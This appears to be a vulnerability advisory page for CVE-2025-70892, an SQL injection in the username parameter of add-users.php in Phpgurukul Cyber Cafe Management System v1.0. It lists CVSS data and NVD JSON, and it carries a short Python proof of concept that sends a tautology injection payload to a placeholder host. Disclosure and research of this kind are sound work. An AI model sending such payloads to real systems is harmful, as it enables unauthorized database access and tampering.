Security Vulnerability Report
CVE-2025-70892 CVSS 9.8 CRITICAL

Published: 2026-01-15 21:16:05
Last Modified: 2026-01-22 16:00:54

Description

Phpgurukul Cyber Cafe Management System v1.0 contains a SQL Injection vulnerability in the user management module. The application fails to properly validate user-supplied input in the username parameter of the add-users.php endpoint.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Phpgurukul Cyber Cafe Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Endpoint named in the description; the host is the page's placeholder
target = 'http://target.com/add-users.php'

# Injection string sent in the username parameter
payload = "' OR '1'='1 -- -"
data = {'username': payload, 'password': 'test123', 'email': '[email protected]'}

response = requests.post(target, data=data)
print(response.text)
```

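References

https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70892 (Exploit, Mitigation, Third Party Advisory)
https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ (Product)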

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70892", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.010", "lastModified": "2026-01-22T16:00:53.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Phpgurukul Cyber Cafe Management System v1.0 contains a SQL Injection vulnerability in the user management module. The application fails to properly validate user-supplied input in the username parameter of the add-users.php endpoint."}, {"lang": "es", "value": "Phpgurukul Cyber Cafe Management System v1.0 contiene una vulnerabilidad de inyección SQL en el módulo de gestión de usuarios. La aplicación no valida correctamente la entrada proporcionada por el usuario en el parámetro username del endpoint add-users.PHP."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "076A2810-A876-4B7D-B728-BCCE977A7225"}]}]}], "references": [{"url": "https://github.com/efekaanakkar/Cyber-Cafe-Management-System-CVEs/tree/main/CVE-2025-70892", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/", "source": "[email protected]", "tags": 
["Product"]}]}}